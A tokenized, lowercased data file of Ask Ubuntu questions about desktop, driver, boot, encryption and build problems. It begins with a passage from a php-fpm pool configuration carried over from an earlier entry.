; ; ; [ global ] ; pid file ; note : the default prefix is /var ; default value : none pid = /var/run/php5-fpm.pid ; error log file ; note : the default prefix is /var ; default value : log/php-fpm.log error_log = /var/log/php5-fpm.log ; log level ; possible values : alert , error , warning , notice , debug ; default value : notice log_level = debug ; if this number of child processes exit with sigsegv or sigbus within the time ; interval set by emergency_restart_interval then fpm will restart . a value ; of '0 ' means 'off ' . ; default value : 0 emergency_restart_threshold = 4 ; interval of time used by emergency_restart_interval to determine when ; a graceful restart will be initiated . this can be useful to work around ; accidental corruptions in an accelerator 's shared memory . ; available units : s ( econds ) , m ( inutes ) , h ( ours ) , or d ( ays ) ; default unit : seconds ; default value : 0 emergency_restart_interval = 10s ; time limit for child processes to wait for a reaction on signals from master . ; available units : s ( econds ) , m ( inutes ) , h ( ours ) , or d ( ays ) ; default unit : seconds ; default value : 0 ; process_control_timeout = 10s ; send fpm to background . set to 'no ' to keep fpm in foreground for debugging . ; default value : yes ; daemonize = yes ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; pool definitions ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; multiple pools of child processes may be started with different listening ; ports and different management options . the name of the pool will be ; used in logs and stats . there is no limitation on the number of pools which ; fpm can handle . your system will tell you anyway : ) ; to configure the pools it is recommended to have one .conf file per ; pool in the following directory : include=/etc/php5/fpm/pool.d/*.conf and my pool.d/www.conf ; start a new pool named 'www ' . ; the variable $ pool can we used in any directive and will be replaced by the ; pool name ( 'www ' here ) [ www ] ; per pool prefix ; it only applies on the following directives : ; - 'slowlog' ; - 'listen ' ( unixsocket ) ; - 'chroot' ; - 'chdir' ; - 'php_values' ; - 'php_admin_values' ; when not set , the global prefix ( or /usr ) applies instead . ; note : this directive can also be relative to the global prefix . ; default value : none ; prefix = /path/to/pools/ $ pool ; the address on which to accept fastcgi requests . ; valid syntaxes are : ; 'ip.add.re.ss : port ' - to listen on a tcp socket to a specific address on ; a specific port ; ; 'port ' - to listen on a tcp socket to all addresses on a ; specific port ; ; '/path/to/unix/socket ' - to listen on a unix socket . ; note : this value is mandatory . # listen = 127.0.0.1:9010 listen = /var/run/php5-fpm.sock ; set listen ( 2 ) backlog . a value of '-1 ' means unlimited . ; default value : 128 ( -1 on freebsd and openbsd ) ; listen.backlog = -1 ; list of ipv4 addresses of fastcgi clients which are allowed to connect . ; equivalent to the fcgi_web_server_addrs environment variable in the original ; php fcgi ( 5.2.2+ ) . makes sense only with a tcp listening socket . each address ; must be separated by a comma . if this value is left blank , connections will be ; accepted from any ip address . ; default value : any listen.allowed_clients = 127.0.0.1 ; set permissions for unix socket , if one is used . in linux , read/write ; permissions must be set in order to allow connections from a web server . many ; bsd-derived systems allow connections regardless of permissions . ; default values : user and group are set as the running user ; mode is set to 0666 listen.owner = www-data listen.group = www-data listen.mode = 0666 ; unix user/group of processes ; note : the user is mandatory . if the group is not set , the default user 's group ; will be used . user = www-data group = www-data ; choose how the process manager will control the number of child processes . ; possible values : ; static - a fixed number ( pm.max_children ) of child processes ; ; dynamic - the number of child processes are set dynamically based on the ; following directives : ; pm.max_children - the maximum number of children that can ; be alive at the same time . ; pm.start_servers - the number of children created on startup . ; pm.min_spare_servers - the minimum number of children in 'idle' ; state ( waiting to process ) . if the number ; of 'idle ' processes is less than this ; number then some children will be created . ; pm.max_spare_servers - the maximum number of children in 'idle' ; state ( waiting to process ) . if the number ; of 'idle ' processes is greater than this ; number then some children will be killed . ; note : this value is mandatory . pm = dynamic ; the number of child processes to be created when pm is set to 'static ' and the ; maximum number of child processes to be created when pm is set to 'dynamic ' . ; this value sets the limit on the number of simultaneous requests that will be ; served . equivalent to the apachemaxclients directive with mpm_prefork . ; equivalent to the php_fcgi_children environment variable in the original php ; cgi . ; note : used when pm is set to either 'static ' or 'dynamic' ; note : this value is mandatory . pm.max_children = 24 ; the number of child processes created on startup . ; note : used only when pm is set to 'dynamic' ; default value : min_spare_servers + ( max_spare_servers - min_spare_servers ) / 2 pm.start_servers = 4 ; the desired minimum number of idle server processes . ; note : used only when pm is set to 'dynamic' ; note : mandatory when pm is set to 'dynamic' pm.min_spare_servers = 2 ; the desired maximum number of idle server processes . ; note : used only when pm is set to 'dynamic' ; note : mandatory when pm is set to 'dynamic' pm.max_spare_servers = 6 ; the number of requests each child process should execute before respawning . ; this can be useful to work around memory leaks in 3rd party libraries . for ; endless request processing specify '0 ' . equivalent to php_fcgi_max_requests . ; default value : 0 ; pm.max_requests = 500 ; the uri to view the fpm status page . if this value is not set , no uri will be ; recognized as a status page . by default , the status page shows the following ; information : ; accepted conn - the number of request accepted by the pool ; ; pool - the name of the pool ; ; process manager - static or dynamic ; ; idle processes - the number of idle processes ; ; active processes - the number of active processes ; ; total processes - the number of idle + active processes . ; max children reached - number of times , the process limit has been reached , ; when pm tries to start more children ( works only for ; pm 'dynamic ' ) ; the values of 'idle processes ' , 'active processes ' and 'total processes ' are ; updated each second . the value of 'accepted conn ' is updated in real time . ; example output : ; accepted conn : 12073 ; pool : www ; process manager : static ; idle processes : 35 ; active processes : 65 ; total processes : 100 ; max children reached : 1 ; by default the status page output is formatted as text/plain . passing either ; 'html ' or 'json ' as a query string will return the corresponding output ; syntax . example : ; http : //www.foo.bar/status ; http : //www.foo.bar/status ? json ; http : //www.foo.bar/status ? html ; note : the value must start with a leading slash ( / ) . the value can be ; anything , but it may not be a good idea to use the .php extension or it ; may conflict with a real php file . ; default value : not set ; pm.status_path = /status ; the ping uri to call the monitoring page of fpm . if this value is not set , no ; uri will be recognized as a ping page . this could be used to test from outside ; that fpm is alive and responding , or to ; - create a graph of fpm availability ( rrd or such ) ; ; - remove a server from a group if it is not responding ( load balancing ) ; ; - trigger alerts for the operating team ( 24/7 ) . ; note : the value must start with a leading slash ( / ) . the value can be ; anything , but it may not be a good idea to use the .php extension or it ; may conflict with a real php file . ; default value : not set ; ping.path = /ping ; this directive may be used to customize the response of a ping request . the ; response is formatted as text/plain with a 200 response code . ; default value : pong ; ping.response = pong ; the timeout for serving a single request after which the worker process will ; be killed . this option should be used when the 'max_execution_time ' ini option ; does not stop script execution for some reason . a value of '0 ' means 'off ' . ; available units : s ( econds ) ( default ) , m ( inutes ) , h ( ours ) , or d ( ays ) ; default value : 0 ; request_terminate_timeout = 0 ; the timeout for serving a single request after which a php backtrace will be ; dumped to the 'slowlog ' file . a value of '0s ' means 'off ' . ; available units : s ( econds ) ( default ) , m ( inutes ) , h ( ours ) , or d ( ays ) ; default value : 0 ; request_slowlog_timeout = 0 ; the log file for slow requests ; default value : not set ; note : slowlog is mandatory if request_slowlog_timeout is set ; slowlog = log/ $ pool.log.slow ; set open file descriptor rlimit . ; default value : system defined value ; rlimit_files = 1024 ; set max core size rlimit . ; possible values : 'unlimited ' or an integer greater or equal to 0 ; default value : system defined value ; rlimit_core = 0 ; chroot to this directory at the start . this value must be defined as an ; absolute path . when this value is not set , chroot is not used . ; note : you can prefix with ' $ prefix ' to chroot to the pool prefix or one ; of its subdirectories . if the pool prefix is not set , the global prefix ; will be used instead . ; note : chrooting is a great security feature and should be used whenever ; possible . however , all php paths will be relative to the chroot ; ( error_log , sessions.save_path , ... ) . ; default value : not set ; chroot = ; chdir to this directory at the start . ; note : relative path can be used . ; default value : current directory or / when chroot chdir = / ; redirect worker stdout and stderr into main error log . if not set , stdout and ; stderr will be redirected to /dev/null according to fastcgi specs . ; note : on highloaded environement , this can cause some delay in the page ; process time ( several ms ) . ; default value : no catch_workers_output = yes ; pass environment variables like ld_library_path . all $ variables are taken from ; the current environment . ; default value : clean env ; env [ hostname ] = $ hostname ; env [ path ] = /usr/local/bin : /usr/bin : /bin ; env [ tmp ] = /tmp ; env [ tmpdir ] = /tmp ; env [ temp ] = /tmp ; additional php.ini defines , specific to this pool of workers . these settings ; overwrite the values previously defined in the php.ini . the directives are the ; same as the php sapi : ; php_value/php_flag - you can set classic ini defines which can ; be overwritten from php call 'ini_set ' . ; php_admin_value/php_admin_flag - these directives wo n't be overwritten by ; php call 'ini_set' ; for php_*flag , valid values are on , off , 1 , 0 , true , false , yes or no . ; defining 'extension ' will load the corresponding shared extension from ; extension_dir . defining 'disable_functions ' or 'disable_classes ' will not ; overwrite previously defined php.ini values , but will append the new value ; instead . ; note : path ini options can be relative and will be expanded with the prefix ; ( pool , global or /usr ) ; default value : nothing is defined by default except the values in php.ini and ; specified at startup with the -d argument ; php_admin_value [ sendmail_path ] = /usr/sbin/sendmail -t -i -f www @ my.domain.com ; php_flag [ display_errors ] = off php_admin_value [ error_log ] = /var/log/fpm-php.www.log ; php_admin_flag [ log_errors ] = on ; php_admin_value [ memory_limit ] = 32m
96657	location of gnome automount	is there a way to tell nautilus where to automount specific devies - say , mount a device with uuid=xxx-yyy on /foo/bar ? also , is there a way to disable/enable automount for specific devices ( by specifying a uuid or device label ) ?
96658	how do i change the vga resolution for the non-graphical ttys ?	i have 200 chars in width , and only 2 old eyes . that 's too much of too little : ) i 've seen various answers on these forums , but none of them seemed to help me . : ~ $ sudo hwinfo -- framebuffer | grep mode model : `` intel ( r ) sandybridge mobile graphics controller '' snip ! mode 0x0318 : 1024x768 ( +4096 ) , 24 bits snip ! is the resolution i 'm going for ( i 've cut away a lot of resolutions there ) i 'm on oneiric which of course means grub2
96662	brightness control on awesome windowing manager	i have just installed awesome wm and i have no options to change the screen brightness , and also its shortcut does n't working . any one can help ?
96668	how can i do facebook video calls ?	my question is how i can do video calls on facebook , i 'm new to linux , recently installed ubuntu 11.10 . i really like the os but i can not make video calls on facebook and this is terrible . please anyone who can help in this .
96671	help with asus p5n-d	i ca n't get the 64 bit ubuntu to install i have a asus p5n-d . it says `` panic : early exception 06 rip 10 : ffffffff81af2476 error 0 cr2 f0a 788 '' when trying to boot .
96672	help pathofexile on wine ?	ubuntu 12.04 fglrx - catalyst 11.12-2 unity desktop - awesomewm pastebin : http : //pastebin.com/38pprfxk launched by : wine / playonlinux installed packages : dx9 , dx11 , vc2008 vc2005 err : [ pol_wine ] message : running wine-1.3.37 client.exe wine : can not find l '' c : \windows\system32\winemenubuilder.exe '' err : wineboot : processrunkeys error running cmd l '' c : \windows\system32\winemenubuilder.exe -a -r '' ( 2 ) p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : dbghelp : elf_search_auxv ca n't find symbol in module fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory err : seh : raise_exception unhandled exception code e0000001 flags 0 addr 0x7b83b362 [ pol_wine ] message : wine return : 1 anyone have any ideas ? game is said to work with wine !
96673	unity crashed ubuntu 11.10	so i installed compiz manager and ticked water effect or something , after that unity menu crashed and i can not enable it , unity 2d works fine can some one help me to re enable unity
96677	direction for a socially concious computer illiterate	i want to speak ubuntu but have missed the computer revolution being involved the real one please guide me to a spot where i can start a journey into the world of ubuntu , linux , mozzilla ... ... .activism even if it 's from my brand new pre-owned computer chair , very ergonomic or at least comfortable . please suggest my first step.applogies for an innapropriate use of this box but eager to rejoin life .
96681	ubuntu does n't seem to shut down unless i force kill it . suggestions ?	when i am logged in , i press shut down and it logs out . from the log in screen i try to shut down and nothing happens . does anyone know how to fix this ?
96686	sphinx initial configuration hungs at checking for cflags needed	i have never had any problem installing sphinx on ubuntu ( local and sphinx 2.0.2 ) . always worked out of the box . today i tried to install sphinx 2.0.3 on ubuntu 11.10 on amazon ec2 . i have started with `` ./configure -- prefix=/home/sphinx '' as usual . have all mysql libs and essential package all in place . it just does n't go through `` checking for cflags needed for pthreads ... '' . below is the output . tried sphinx 2.0.2 as well . no luck . btw , you can notice under `` checking for header files '' block that pthread headers exists : ... .. checking pthread.h usability ... yes checking pthread.h presence ... yes checking for pthread.h ... yes ... . what should i check ? checking build environment -- -- -- -- -- -- -- -- -- -- -- -- -- checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for compiler programs -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- checking whether to compile debug version ... no checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking for ranlib ... ranlib checking for header files -- -- -- -- -- -- -- -- -- -- -- -- - checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/wait.h that is posix.1 compatible ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking fcntl.h usability ... yes checking fcntl.h presence ... yes checking for fcntl.h ... yes checking limits.h usability ... yes checking limits.h presence ... yes checking for limits.h ... yes checking netdb.h usability ... yes checking netdb.h presence ... yes checking for netdb.h ... yes checking netinet/in.h usability ... yes checking netinet/in.h presence ... yes checking for netinet/in.h ... yes checking for stdlib.h ... ( cached ) yes checking for string.h ... ( cached ) yes checking sys/file.h usability ... yes checking sys/file.h presence ... yes checking for sys/file.h ... yes checking sys/socket.h usability ... yes checking sys/socket.h presence ... yes checking for sys/socket.h ... yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking for unistd.h ... ( cached ) yes checking pthread.h usability ... yes checking pthread.h presence ... yes checking for pthread.h ... yes checking execinfo.h usability ... yes checking execinfo.h presence ... yes checking for execinfo.h ... yes checking expat.h usability ... no checking expat.h presence ... no checking for expat.h ... no checking iconv.h usability ... yes checking iconv.h presence ... yes checking for iconv.h ... yes checking zlib.h usability ... yes checking zlib.h presence ... yes checking for zlib.h ... yes checking sql.h usability ... no checking sql.h presence ... no checking for sql.h ... no checking syslog.h usability ... yes checking syslog.h presence ... yes checking for syslog.h ... yes checking for types -- -- -- -- -- -- -- -- -- checking for stdbool.h that conforms to c99 ... yes checking for _bool ... yes checking for an ansi c-conforming const ... yes checking for inline ... inline checking for off_t ... yes checking for size_t ... yes checking whether time.h and sys/time.h may both be included ... yes checking for library functions -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- checking for pid_t ... yes checking vfork.h usability ... no checking vfork.h presence ... no checking for vfork.h ... no checking for fork ... yes checking for vfork ... yes checking for working fork ... yes checking for working vfork ... ( cached ) yes checking for stdlib.h ... ( cached ) yes checking for gnu libc compatible malloc ... yes checking for stdlib.h ... ( cached ) yes checking for gnu libc compatible realloc ... yes checking sys/select.h usability ... yes checking sys/select.h presence ... yes checking for sys/select.h ... yes checking for sys/socket.h ... ( cached ) yes checking types of arguments for select ... int , fd_set * , struct timeval * checking return type of signal handlers ... void checking whether lstat correctly handles trailing slash ... yes checking whether stat accepts an empty string ... no checking for vprintf ... yes checking for _doprnt ... no checking for library containing setsockopt ... none required checking for library containing gethostbyname ... none required checking for library containing xml_parse ... no checking for library containing iconv ... none required checking for library containing inflate ... -lz checking for library containing logf ... -lm checking for dup2 ... yes checking for gethostbyname ... yes checking for gettimeofday ... yes checking for memmove ... yes checking for memset ... yes checking for select ... yes checking for socket ... yes checking for strcasecmp ... yes checking for strchr ... yes checking for strerror ... yes checking for strncasecmp ... yes checking for strstr ... yes checking for strtol ... yes checking for logf ... yes checking for pread ... yes checking for backtrace ... yes checking for backtrace_symbols ... yes checking for clock_gettime in -lrt ... yes checking for clock_gettime ... yes checking for lock_ex in sys/file.h ... yes checking for f_setlkw in fcntl.h ... yes checking for dlopen in -ldl ... yes checking for dlopen ... yes checking for dlerror ... yes configuring sphinx -- -- -- -- -- -- -- -- -- checking for cflags needed for pthreads ...
96691	keep getting sent back to login screen	i keep getting sent back to the login screen after i enter my password ( correctly ) . the screen goes black for a moment then sends me back to the login screen . tried looking at solutions but none seem to work , deleting xorg.conf failed too . ( ca n't login in classic version or any others except guest session and terminal ) thanks !
96692	how do i move the unity launcher to the bottom ?	how do i move the unity launcher to the bottom
96693	how do i prevent webpages from stealing focus in webkit ?	i use a gtk treeview to display different websites in my python program . when the selected rows change , the web page is updated to the url field in the store . this works nicely , but a lot of web pages uses javascript to focus an input field . this means i ca n't use the keyboard to navigate the treeview . i do n't know how to disable javascript completely , but i also do n't want to , because an increasing number of pages are dependent on it . however , i would like to prevent the focus theft . one thing i could do , is to implement some sort of memory about what the user has done , and if focus is removed without user interaction , then i move focus back to the last widget the user interacted with . but this seems ugly . is there a better way ?
96700	i have an error message in update manager	i got this error message e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/janousek_jiri-google-music-frame-releases-oneiric.list i ca n't open my software center as well . how can i fix this ?
96713	dell dimension 3000 using cisco am10	i have the same problem of the computer going to sleep and not waking up on a dell dimension 3000 on dual boot with xp and ubuntu 11.1 . on rebooting , the computer fails to recognise the usb wireless modem cisco am10 , while upon reinstalling through wubi , the wireless connection is restored . while i found a solution for the the sleep problem from this forum ( gnome screensaver bug affecting intel 82865g chipset ) , i would like to understand what is going on with the usb wireless modem when ubuntu crashes . any help is appreciated .
96715	how to make `wakeup` plugins work ?	wakeup application is meant to greet a user at specific time , saying things like current wind and temperature outside . but i ca n't get how to make the thing work on ubuntu : what am i meant to install for weather information to be provided correctly ( all the wakeup plugins are installed and turned on , their settings do n't offer anything to help ) . i use xubuntu 11.10 .
96723	is there a way to organize applications in gnome shell 's applications menu ?	since by default , gnome organizes its `` applications '' pane in alphabetical order , there is always a sprawling mess of applications , and i do n't like how it automatically arranges them into categories ( `` accessories '' , `` electronics '' , `` games '' , etc ) . is there perhaps a shell extension so that i can manually organize my applications in folders or something ? windows-style ?
96724	separate but united home directory	my hard disk is separated into 3 parts . 1. system 2. home ( my stuff , work and such ) 3. swap the original idea is that i can reinstall and/or configure and/or experiment with the system without affecting my own data . or possibly overwrite ubuntu with another distro ( i.e . mint ) while still keeping my `` home '' intact . i 'm also thinking of making another partition to install mint alongside ubuntu with both sharing the same home directory . q1 : can i do a fresh reinstall of the system without wiping out the home dir ? q2 : how can i install mint ( or other distro ) alongside ubuntu in 2 separate systems dir . but only 1 home dir ? thanks . [ am not a newbie , but not a programmer , just a power user ]
96727	resize/move edge too narrow on windows	when hovering near the edge of a window you get an option to resize them . however that edge is too narrow when i 'm using trackpoint or touchpad , making it difficult to hit the 'sweet spot' is there a way i can increase the width ( respectively height ) of the 'hot-zone ' ?
96750	ubuntu 11.10 can not connect to projector	i install ubuntu 11.10 into my laptop with dual-boot . in windows , i can not output both is laptop monitor and projector . but in ubuntu , it fail to . then i install ubuntu in my pendrive with unetbootin , and boot it with another pc , still no luck . that pc has no graphic card , so i believe it is not the graphic card issue that causes the projector to not working . any idea ? i want to output to a projector
96751	encrypted lvm - bad password or options	i 've deployed a number of laptops to our staff with encrypted lvm . i 've used the alternative cd , whole disk & guided partitioning . this is the second laptop that came back to me with the same symptoms , namely the issued password does n't work any more . both laptops are probook 4530s ( i5 , 4 gb , 600gb ) . it 's no keyboard mapping issue , there is only one keyboard installed and the pass is ascii + numbers , no special chars . there is zero chance both users messed around with the disk utility and tried to change it . i 've researched the issue after the first laptop came back to me , had no luck finding anything similar and wrote it off as bad luck . but two laptops in 14 days , i 'm freaking out here , encrypted fs was the primary reason we chose ubuntu for deployment . i suppose there is no way i can access the fs . cryptsetup luksdump /dev/sda5 lists a single key slot . so is this a known bug ? are there guidelines as to what to watch out for in regards to deployment on a laptop , like do n't hibernate or whatever ? * update * after wiping the disk , installing a fresh ubuntu 11.10 , doing the update & upgrade and verified everything is working , i 've shipped the laptop back . less than 24 hours later , it 's the same issue . the password does n't work any more . i mean , if it 's a faulty disk or bad ram or whatever it is inconceivable that it manifests itself by screwing up just the password . is it maybe an issue with the disk size , should i make the partition smaller or eliminate swap ?
96752	adobe flash not working on full screen	when i play flash videos in firefox or chrome and try to view it in fullscreen mode , it stops every second , the sound is good but not the video . i think i have tried everything and nothing works , i ; m driving me crazy with this bug i already modified /etc/adobe/mms.cfg assing line `` overridegpuvalidation = 1 '' | sudo tee -a i checked the sync to vblank box in nvidia settings i unchecked the hardware acceleration in flash setting also re-activated it uninstalled flash plugin and installed gnash , it did not worked i already tried installing flash-aid in firefox , and it neither work i have a 64 bits hp pavillion with a geforce 6150se nforce 430/pci/sse2 as graphic card ,
96753	two ati radeon cards on 10.04	i would like to use two different cards from ati on my desktop . one card is integrated with the mainboard and second is bought as a standalone vga . does it have any possilibity to succeed ? thanks , regards
96756	can issetuid ( ) be cleared for a child process ?	i have a wrapper script a which is calling program b . a must be invoked as root so some initial setup can happen . after that , a calls setuid ( ) and setgid ( ) to reduce its own privileges , for safety and security . then , a invokes b . the problem is that b exhibits undesirable behavior if and only if a has called setuid ( ) /setgid ( ) before invoking b . this does not happen when i invoke b directly as different users via sudo -u xxx -g xxx . as far as i can tell ( correct me if i am wrong ) , the only way b could know that a has changed the user is via the issetuid ( ) syscall ( i 've checked the environment variables ; they match ) . how can i clear this bit , so that b behaves normally ? it seems that the use of issetuid ( ) is something about keeping track of whether the process is `` tainted '' , i.e . carries artifacts from a less privileged environment ( ? ) . but i 've reduced my privileges , not elevated them ! and on top of that , i 've scrubbed my env vars anyway ! beyond the very terse man page on issetuid ( ) , i can find almost nothing about this syscall/magical program state . can anyone lend a better understanding ?
96758	single-click to open folder on desktop not working on xubuntu	i 've enabled single-click for opening files , folder etc . it is working normally inside a folder but i still need to double-click on files/folder on desktop . please advice .
96762	looking for a gnome panel applet which can open and close the dvd/cd tray	i am looking for a gnome panel applet which can open and close the dvd/cd tray , i am on ubuntu 11.04 and use gnome classic desktop environment . thanks
96770	wubi : permission denied : 'c : \\boot.ini '	i got a problem with installing ubuntu with the help of wubi . my configuration is a laptop with single hdd , windows xp sp3 and my user account with admin rights . wubi version is rev245 . i can manually change the file boot.ini ( and i already removed the read-only flag ) but wubi always crashes with the following error : traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 606 , in modify_bootini file `` \lib\wubi\backends\common\utils.py '' , line 239 , in write_file ioerror : [ errno 13 ] permission denied : 'c : \\boot.ini' i added the following line manually c : \wubildr.mbr= '' ubuntu '' but i am stuck with a grub shell bootloader that does n't recognize any kernels ( as these files were n't copied ) . is there a switch to tell wubi to proceed even if it ca n't access boot.ini perhaps ? thank you for your help !
96771	gnome shell - modal popups on dual screen systems	i 'm working on a laptop , which i connect to a second monitor if i 'm at my desk . everything works more or less well , but i 'm having an issue with modal popups , especially in the eclipse ide - if used over two screens . modal popups are automatically centred on the application window , and can only be resized , but not moved ( use window / preferences as an example ) . this makes it extremely hard and challenging to read the content of any application that stretches over two screens , especially if - as in my case - there is a gap of some centimetres between them . i definitely need a way to disable this behaviour ... any hints ? update : uploaded a picture of my screens - i simply ca n't believe that i 'm the only one with this issue ...
96773	how do i interface my samsung rugby ii phone with ubuntu ?	i have a samsung rugby ii phone , which i charge by plugging into the usb port . it has pictures and video on it , which i 'd like to get out through the usb port , but nothing pops up in ubuntu when i plug it in . when i plug it in , the phone presents a menu asking me to select the usb mode . the choices are `` media player '' , `` pc studio '' , and `` mass storage '' . if i select `` media player '' , the response to lsusb in ubuntu is : bus 001 device 008 : id 04e8:5a0f samsung electronics co. , ltd meizu m6 miniplayer if i select `` pc studio '' , lsusb says : bus 001 device 011 : id 04e8:6810 samsung electronics co. , ltd if i select `` mass storage '' , nothing is ever presented according to lsusb , and the phone is stuck in a prompt asking me to `` insert memory card '' . i do n't have a memory card in the phone ( or at all ) , but the phone does have some sort of non-volatile memory ( it keeps a bunch of photos and videos perfectly well without an additional card ) . does anyone know how to get the pics and vids i took out of it in ubuntu without having to mms them to myself ?
96775	wlan0 does not show up on iwconfig	os : ubuntu 11.10 hw : sdio wifi dongle with atheros ar6103 module pci to sdio adapter board problem : the system does not recognize the wifi dongle although the adapter board is sensing the dongle insertion by turning on a led additional information : root @ gigabyte : /home/ady # ifconfig eth0 link encap : ethernet hwaddr 50 : e5:49 : c0:2d:55 inet addr:192.168.1.159 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :52e5:49ff : fec0:2d55/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4669 errors:0 dropped:0 overruns:0 frame:0 tx packets:3058 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5455223 ( 5.4 mb ) tx bytes:258681 ( 258.6 kb ) interrupt:40 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) root @ gigabyte : /home/ady # iwconfig lo no wireless extensions . eth0 no wireless extensions . root @ gigabyte : /home/ady # lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1c.6 pci bridge : intel corporation 82801 pci bridge ( rev b5 ) 00:1c.7 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 8 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation z68 express chipset family lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation 6 series/c200 series chipset family 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation 6 series/c200 series chipset family 2 port sata ide controller ( rev 05 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 03:00.0 pci bridge : integrated technology express , inc. device 8892 ( rev 30 ) 04:01.0 flash memory : ene technology inc ene pci memory stick card reader controller 04:01.1 sd host controller : ene technology inc ene pci smartmedia / xd card reader controller 04:01.2 flash memory : ene technology inc memory stick card reader controller 05:00.0 usb controller : etron technology , inc. ej168 usb 3.0 host controller ( rev 01 )
96776	missing icons in dropdown menus in eclipse	icons do n't appear in dropdown menus in eclipse . i know that in gnome this bug can be cured by this way : icons on menus have disappeared but it does n't work in unity . any suggestions ? thanks in advance .
96778	dvd reader not working in ubuntu 11.10	i installed ubuntu 11.10 last december . it used to read dvds and cds but after many updates installed and using it excessively it only reads cds and not dvds ! what could be the problem ? how can i solve it ? also , when i wanted to install windows 7 on my system , i inserted the windows 7 dvd , it did n't boot from the dvd to install it .
96784	ubiqity preseed , to have aligned partitions on disk	i tried to use the expert_reciepe to have aligned partitions on a high capacity disk with 4096b block size . ubiquity partman/alignment select optimal ubiquity partman-auto/disk string /dev/sdb ubiquity partman-auto/choose_recipe select myboot-part ubiquity partman-auto/expert_recipe string \ myboot-part : : \ 10240 1049 10240 ext4 \ $ primary { } $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { / } \ . \ 16384 8172 16384 linux-swap \ $ primary { } method { swap } \ . \ 30720 10240 30720 ext4 \ $ primary { } method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /backup_fs } \ . \ 10240 10240 10000000 ext4 \ $ primary { } method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /home } \ . and i was expecting the preseed partman/alignment select optimal should have allowed me to have aligned partitions on the disk . but the partitions are not aligned . alternatively , i use a script to partition the disk to have aligned partitions in it . and then run the ubiquity with the preseed file to make use the existing partitions . the partitions i created are for / , /home and swap . but i do n't know how to achieve this using a preseed file . i 've tried reading through guides for preseeding and customization , but i did not understand how and where to modify the pressed options to make use of the existing partitions on the disk .
96787	stop boinc from auto-start on system boot	i have installed boinc and subscribed to the projects i used to have on my old windows machine . everything works fine with one exception . i did not see any option in boinc manager to specify if i want my job to start on system boot or not . after a reboot i can clearly see in the processes that boinc is doing it 's calculations even though the manager is not running . so , is there a way to stop this process to autostart ? should i create a startup script which starts 30-40 seconds after login and kills all boinc processes ? this seems kind of drastic i think : )
